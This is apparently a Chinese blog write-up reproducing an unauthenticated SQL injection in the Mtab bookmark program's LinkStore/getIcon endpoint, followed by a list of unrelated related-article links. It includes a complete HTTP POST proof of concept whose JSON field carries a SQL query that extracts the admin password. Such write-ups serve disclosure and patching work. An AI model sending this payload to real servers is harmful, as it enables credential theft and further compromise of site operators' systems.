博客
关于我
Mtab书签导航程序 LinkStore/getIcon SQL注入漏洞复现
阅读量:798 次
发布时间:2023-02-10

本文共 746 字,大约阅读时间需要 2 分钟。

Mtab书签导航程序安全审计报告

产品简介

Mtab书签导航程序是一款专注于网页和应用书签管理的免费浏览器插件。作为一款无广告的在线书签工具,它支持多端同步、美观易用的导航体验,旨在帮助用户高效管理网页和应用,提升在线浏览效率。

漏洞发现

在安全测试中,我们发现该程序的LinkStore/getIcon接口存在严重的SQL注入漏洞。该漏洞未经身份验证,攻击者可利用这一漏洞获取以下信息:

  • 数据库中的敏感信息,包括管理员后台密码和用户个人信息
  • 高权限权限下,可向服务器中写入木马程序,进一步获取系统权限

复现环境

  • 工具:使用常见的Web安全工具进行请求构造
  • 目标URL/LinkStore/getIcon
  • 请求方法:POST请求
  • 请求头
    Host: [目标域名]User-Agent: [模拟浏览器信息]
  • 内容类型:application/json

漏洞复现

通过对接口的仔细分析,我们成功构造了以下证明用例(PoC):

POST /LinkStore/getIcon HTTP/1.1Host: [目标域名]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Content-Type: application/jsonConnection: Keep-alive{  "param": "SELECT `user`.`password` FROM `user` WHERE `username`= 'admin'"}

总结

该漏洞对系统安全性构成重大威胁,建议及时修复并升级相关接口安全性。

转载地址:http://ioffk.baihongyu.com/

你可能感兴趣的文章
OpenMCU(一):STM32F407 FreeRTOS移植
查看>>
OpenMCU(二):GD32E23xx FreeRTOS移植
查看>>
OpenMMLab | S4模型详解:应对长序列建模的有效方法
查看>>
OpenMMLab | 【全网首发】Llama 3 微调项目实践与教程(XTuner 版)
查看>>
OpenMMLab | 面向多样应用需求,书生·浦语2.5开源超轻量、高性能多种参数版本
查看>>
OpenPPL PPQ量化(4):计算图的切分和调度 源码剖析
查看>>
OpenPPL PPQ量化(5):执行引擎 源码剖析
查看>>
Openresty框架入门详解
查看>>
OpenResty(2):OpenResty开发环境搭建
查看>>
openshift搭建Istio企业级实战
查看>>
Openstack 之 网络设置静态IP地址
查看>>
OpenStack 综合服务详解
查看>>
OpenStack 网络服务Neutron详解
查看>>
Openstack(两控制节点+四计算节点)-1
查看>>
Openstack企业级云计算实战第二、三期培训即将开始
查看>>
OpenStack创建虚拟机实例实战
查看>>
OpenStack安装部署实战
查看>>
OpenStack版本升级与故障排查实战
查看>>
OpenStack的基本概念与架构详解
查看>>
Openstack的视频学习
查看>>